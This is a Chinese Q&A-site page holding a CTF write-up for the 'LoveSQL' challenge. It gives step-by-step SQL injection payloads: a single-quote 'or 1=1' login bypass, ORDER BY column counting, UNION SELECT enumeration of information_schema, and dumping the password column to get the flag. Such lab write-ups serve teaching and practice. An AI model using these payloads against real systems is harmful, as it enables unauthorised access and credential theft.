已解决
sql注入 [极客大挑战 2019]LoveSQL 1
来自网友在路上 155855提问 提问时间:2023-11-18 17:10:57阅读次数: 55
最佳答案 问答题库558位专家为你答疑解惑
打开题目
几次尝试,发现输1 1",页面都会回显NO,Wrong username password!!!
只有输入1',页面报错,说明是单引号的字符型注入
那我们万能密码试试能不能登录
1' or 1=1 #
成功登录
得到账号和密码
我们登录一下发现什么也没有
爆破列名字段数
1' order by 4 # 页面报错
但是1' order by 3 #时
页面没有报错,说明列名字段数为3
爆破数据显示位
1' union select 1,2,3 #
可以得到数据显示位为2和3
接着我们爆破数据库名
1' union select 1,2,database() #
得到数据库名为geek
爆破表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #
当前数据库下的所有表名有
爆破列名
在这里我们先试试l0ve1ysq1表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
得到其表下有三个字段
我们直接爆破password字段试试下面有没有flag
1' union select 1,2,group_concat(password) from l0ve1ysq1 #
得到数据
直接查看源代码得到flag
查看全文
99%的人还看了
相似问题
- conda创建pytorch环境报错
- Python通过selenium调用IE11浏览器报错解决方法
- kafka本地安装报错
- 【BUG】第一次创建vue3+vite项目启动报错Error: Cannot find module ‘worker_threads‘
- git 构建报错
- Docker build报错总结,版本过新大避雷!
- Mongodb3.4升级高版本mongoTemplate.executeCommand报错The cursor option is required
- duplicate复制数据库单个数据文件复制失败报错rman-03009 ora-03113
- 安装第三方包报错 error: Microsoft Visual C++ 14.0 or greater is required——解决办法
- 邮件|gitpushgithub报错|Lombok注解
猜你感兴趣
版权申明
本文"sql注入 [极客大挑战 2019]LoveSQL 1":http://eshow365.cn/6-38548-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: IIs部署发布vue项目测试环境
- 下一篇: 数据可视化在监控易中的艺术与实践